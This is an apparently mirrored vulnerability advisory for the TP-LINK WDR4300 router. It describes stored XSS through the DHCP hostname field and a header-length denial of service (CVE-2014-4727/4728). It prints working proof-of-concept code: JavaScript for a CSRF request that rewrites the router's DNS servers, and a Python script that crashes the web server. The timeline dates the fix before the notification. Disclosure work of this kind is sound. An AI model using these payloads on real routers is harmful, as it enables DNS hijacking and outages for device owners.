Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TP-LINK WDR4300 XSS / Denial Of Service

🗓️ 22 Sep 2014 00:00:00Reported by Oz ElisyanType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

TP-LINK WDR4300 vulnerable to XSS and DoS attacks; patched in firmware 140916.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		TP-LINK WDR4300 XSS / Denial Of Service Vulnerabilities
23 Sep 201400:00
zdt
Tenable Nessus		TP-LINK WDR4300 Multiple Vulnerabilities
1 Oct 201400:00
nessus
CVE		CVE-2014-4727
30 Sep 201416:00
cve
CVE		CVE-2014-4728
30 Sep 201416:00
cve
Cvelist		CVE-2014-4727
30 Sep 201416:00
cvelist
Cvelist		CVE-2014-4728
30 Sep 201416:00
cvelist
EUVD		EUVD-2014-4646
7 Oct 202500:30
euvd
EUVD		EUVD-2014-4647
7 Oct 202500:30
euvd
NVD		CVE-2014-4727
30 Sep 201416:55
nvd
NVD		CVE-2014-4728
30 Sep 201416:55
nvd
Rows per page
`Advisory Information  
===============  
  
Vendors Contacted: TP-LINK  
Vendor Patched: Yes, Firmware 140916  
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.  
Versions Affected: 130617 , possibly earlier   
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728  
  
  
Vulnerabilities Description  
===================  
  
# Stored XSS -  
  
It is possible inject javascript code via DHCP hostname field,   
If the administrator will visit the dhcp clients page (web panel)  
the script will execute.  
  
# DoS (web server) -  
Denial of service condition to the device web server, remotely or locally send the  
device a "GET" request with an extra "Header" with a long value (A x 3000 times).  
  
  
Proof of Concept:  
============  
  
http://elisyan.com/tplink/wdr4300.html  
  
---- start wdr4300.html ----  
/*  
Author: Oz Elisyan  
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)  
*/  
  
  
  
var xmlhttp;  
if (window.XMLHttpRequest)  
{// code for IE7+, Firefox, Chrome, Opera, Safari  
xmlhttp=new XMLHttpRequest();  
}  
else  
{// code for IE6, IE5  
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");  
}  
xmlhttp.onreadystatechange=function()  
{  
if (xmlhttp.readyState==4 && xmlhttp.status==200)  
{  
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;  
}  
}  
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);  
xmlhttp.send();  
  
  
  
---- end wdr4300.html ----  
  
http://elisyan.com/tplink/wdr4300.py  
  
---- start wdr4300.py ----  
#Author: Oz Elisyan  
#TP-Link WDR4300 DoS PoC  
  
import httplib  
  
conn = httplib.HTTPConnection("192.168.0.1")  
headers = {"Content-type": "application/x-www-form-urlencoded",  
"Accept": "text/plain", "DoS": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}  
conn.request("GET","/", "Let me tell you something", headers)  
  
print "Done"  
  
---- end wdr4300.py ----  
  
  
Report Timeline:  
===========  
  
2014-07-04:  
Vendor notified about the vulnerabilities with all the relevant technical information.  
  
2013-09-16:  
Vendor released a fix.  
  
Credits:  
======  
  
The Vulnerabilities was discovered by Oz Elisyan.  
  
  
References:  
========  
  
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Sep 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.0118
tp-link wdr4300xss vulnerabilitydenial of servicepatched firmwarecve-2014-4727cve-2014-4728
41